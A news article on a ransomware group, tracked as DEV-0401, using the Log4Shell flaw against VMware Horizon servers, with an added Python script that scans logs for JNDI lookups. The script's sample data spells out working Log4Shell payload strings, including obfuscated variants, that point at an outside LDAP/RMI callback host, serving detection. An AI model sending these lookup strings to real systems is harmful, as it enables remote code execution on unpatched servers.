The Log4j vulnerability continues to be exploited by threat actors, and a new ransomware group has been identified actively targeting Log4Shell vulnerabilities in VMware Horizon servers.
According to a 5 January 2022 update from the UK’s National Health Service (NHS), the attackers are trying to establish web shells that can be used to carry out the deployment of malicious software, data exfiltration and the deployment of ransomware. VMware Horizon is a virtual desktop product that leverages the hybrid cloud.
On 11 January 2022, Microsoft provided an update on Log4j vulnerabilities and noted, “as early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon”.
“Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware,” the Microsoft statement said.
NightSky ransomware
The NightSky ransomware was first discovered in December 2021 by MalwareHunterTeam.
The attacks are being performed by a China-based ransomware operator that Microsoft says it is tracking as DEV-0401.
“DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo and Rook, and has similarly exploited internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).”
Based on Microsoft’s analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains.
The NHS statement says that attackers are leveraging the vulnerability to “use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service”.
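The chain the NHS describes starts with a Log4j lookup string (typically a `${jndi:ldap://…}` pattern) reaching a logged field of the exposed service. As an added illustration of the detection side, the following Python script is example code written for this page, not code from the NHS, Microsoft or VMware. It scans constructed access-log lines for JNDI lookups, first collapsing the common `${lower:…}`, `${upper:…}` and `${…:-…}` nesting tricks that attackers use to evade simple string matching, and reports the scheme and callback host of each hit so a defender can triage and block. The log lines, IP addresses and paths are constructed samples, not indicators from the article.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines in common access-log format (not from the article).
# The IPs are RFC 5737 documentation addresses and the payloads are generic
# lookup shapes, shown here only so the detector has something to run over.
SAMPLE_LOG_LINES: List[str] = [
    '198.51.100.5 - - [04/Jan/2022:10:01:22 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [04/Jan/2022:10:02:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [04/Jan/2022:10:02:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [04/Jan/2022:10:02:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/b}"',
]

# Only innermost lookups (no nested "${" inside) are matched, so repeated
# substitution converges the same way Log4j's own recursive resolution does.
_LOWER_UPPER = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# Final JNDI lookup: scheme plus the host the victim would be made to contact.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:/*([^/\s}:]+)",
    re.IGNORECASE,
)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse URL encoding and the obfuscation lookups that Log4j would
    resolve before the JNDI lookup, so the detector sees the plain form."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            return text
        text = new
    return text


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line that carries a JNDI lookup, with the
    1-based line number, lookup scheme, callback host and whether the
    payload needed de-obfuscation to be recognised."""
    findings: List[Dict[str, object]] = []
    for number, raw in enumerate(lines, start=1):
        normalized = normalize_lookups(raw)
        match = _JNDI.search(normalized)
        if match:
            findings.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "host": match.group(2),
                "obfuscated": normalized != raw,
                "raw": raw,
            })
    return findings


def callback_hosts(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct hosts the lookups point at, for egress blocking and triage."""
    return sorted({str(f["host"]) for f in findings})


if __name__ == "__main__":
    hits = scan_log_lines(SAMPLE_LOG_LINES)
    for hit in hits:
        flag = " (obfuscated)" if hit["obfuscated"] else ""
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['host']}{flag}")
    print("callback hosts:", callback_hosts(hits))
```

Run against real web-server, gateway or application logs by feeding the file's lines to `scan_log_lines`; a hit is worth treating as an exploitation attempt regardless of whether the host was patched, and the reported callback hosts are candidates for egress blocking. The normalizer deliberately handles only the lookup forms shown above, so it should complement, not replace, a patched Log4j.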
Log4j impact continues
Since the Log4j vulnerability was uncovered in early December 2021, threat actors have taken advantage of the opportunities it presents.
According to Check Point Research (CPR), Q4 of 2021 saw an all-time peak in weekly cyber-attacks, with CPR counting more than 900 attacks per organization, largely due to the Log4j vulnerability.
Ransomware has been identified as a major issue for those who have not successfully patched the vulnerability.
In December, the UK’s National Cyber Security Centre said: “As the situation evolves, we expect attacks to become more targeted. Ransomware groups may look to use Log4Shell as a method of illicit entry into organizations. Once access is secured, threat actors will then look to obtain further access in order to be able to ransom the whole organization in a highly impactful way.”